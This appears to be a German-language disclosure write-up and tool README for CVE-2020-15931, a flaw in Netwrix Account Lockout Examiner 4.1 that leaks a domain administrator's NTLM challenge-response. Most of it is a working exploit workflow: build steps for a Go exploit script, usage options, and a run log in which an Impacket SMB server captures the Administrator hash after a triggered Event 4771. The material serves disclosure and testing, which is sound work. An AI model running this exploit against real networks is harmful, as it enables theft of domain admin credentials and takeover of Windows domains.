
Netwrix Account Lockout Examiner 4.1 Sicherheitslücke bei der Offenlegung von Anmeldeinformationen des Domänenadministrator-Kontos
Netwrix Account Lockout Examiner (ALE) vor Version 5.1 ermöglicht es einem nicht authentifizierten, entfernten Angreifer, eine Verbindung zu einem vom Angreifer kontrollierten System auszulösen und die NTLMv1/v2-Challenge-Response eines Kontos mit Domänenadministrator-Berechtigungen abzufangen. Das Domänenadministrator-Konto wäre bereits, wie für die Installation erforderlich, mit dem Produkt konfiguriert. Ein Angreifer kann dies ausnutzen, indem er auf einem Domänencontroller ein einzelnes Ereignis „Kerberos Pre-Authentication Failed“ (Event ID 4771) erzeugt.
Weitere Details zu dieser Schwachstelle finden Sie im folgenden Blog

Die Schwachstelle wurde von Robert Surace (@robsauce) und Daniel Min (@bigb0ss), Optiv Security Consultants, bei der Durchführung einer Sicherheitsbewertung in-the-wild entdeckt. Nach der Identifizierung von CVE-2020-15931 kontaktierte Optiv umgehend Netwrix, um den identifizierten Fehler verantwortungsvoll zu melden.
Das Exploit-Skript wurde in golang entwickelt. Installieren Sie die folgenden Abhängigkeiten:
go get github.com/fatih/color
go get github.com/ropnop/gokrb5/client
go get github.com/ropnop/gokrb5/config
Es verwendet außerdem die smbserver.py von Impacket.
pip install impacket
Laden Sie schließlich das Exploit-Skript herunter und kompilieren Sie es.
git clone https://github.com/optiv/CVE-2020-15931
go build cve-2020-15931.go
$ ./cve-2020-15931
_______ ________ ___ ___ ___ ___ __ _____ ___ ____ __
/ ____\ \ / / ____| |__ \ / _ \__ \ / _ \ /_ | ____/ _ \___ \/_ |
| | \ \ / /| |__ ______ ) | | | | ) | | | |______| | |__| (_) |__) || |
| | \ \/ / | __|______/ /| | | |/ /| | | |______| |___ \\__, |__ < | |
| |____ \ / | |____ / /_| |_| / /_| |_| | | |___) | / /___) || |
\_____| \/ |______| |____|\___/____|\___/ |_|____/ /_/|____/ |_|
[robSauce & bigb0ss] v1.0
[+] Netwrix Account Lockout Examiner 4.1 Exploit Script
Required:
-d Domain name
-dc Domain controller
-u Valid username
Optional:
-h Print this help menu
Example:
./cve-2020-15931 -d target.com -dc 10.10.0.2 -u jsmith
(Hinweis: Zum Zeitpunkt der Erstellung dieses Dokuments kann dieser Angriff nur über einen blindbasierten Angriff identifiziert werden. Dies liegt daran, dass es schwierig ist festzustellen, ob die Zielorganisation Netwrix Account Lockout Examiner in ihrem Netzwerk zur Überwachung von Kontoauthentifizierungen einsetzt oder nicht.)
$ ./cve-2020-15931 -d bosslab.com -dc 10.10.0.2 -u b0ss1
_______ ________ ___ ___ ___ ___ __ _____ ___ ____ __
/ ____\ \ / / ____| |__ \ / _ \__ \ / _ \ /_ | ____/ _ \___ \/_ |
| | \ \ / /| |__ ______ ) | | | | ) | | | |______| | |__| (_) |__) || |
| | \ \/ / | __|______/ /| | | |/ /| | | |______| |___ \\__, |__ < | |
| |____ \ / | |____ / /_| |_| / /_| |_| | | |___) | / /___) || |
\_____| \/ |______| |____|\___/____|\___/ |_|____/ /_/|____/ |_|
[robSauce & bigb0ss] v1.0
[+] Netwrix Account Lockout Examiner 4.1 Exploit Script
[+] DC: 10.10.0.2
[+] Domain: bosslab.com
[+] Username: b0ss1
[+] Password: wrongPass
[+] Event ID 4771 (Kerberos Pre-Authentication Failed) Triggered!
[+] If vulnerable, you will get a NTLMv1/2 of the Netwrix service account.
[+] SMB Server Started...
Impacket v0.9.22.dev1+20200607.100119.b5c61678 - Copyright 2020 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.0.2,59264)
[*] AUTHENTICATE_MESSAGE(BOSSLAB\Administrator,BOSSLAB-DC01)
[*] User BOSSLAB-DC01\Administrator authenticated successfully
[*] Administrator::BOSSLAB:17dcc32c6eafc48d:f798e7c906eb1b639722614f1417ded1:0101000000000000be18...REDACTED...0000000
[*] Disconnecting Share(1:IPC$)
[*] Closing down connection (10.10.0.2,59264)
[*] Remaining connections []
Netwrix Account Lockout Examiner 5.1
Event ID 4771
Impacket smbserver.py
Gokrb5 Client
CVE-2020-15931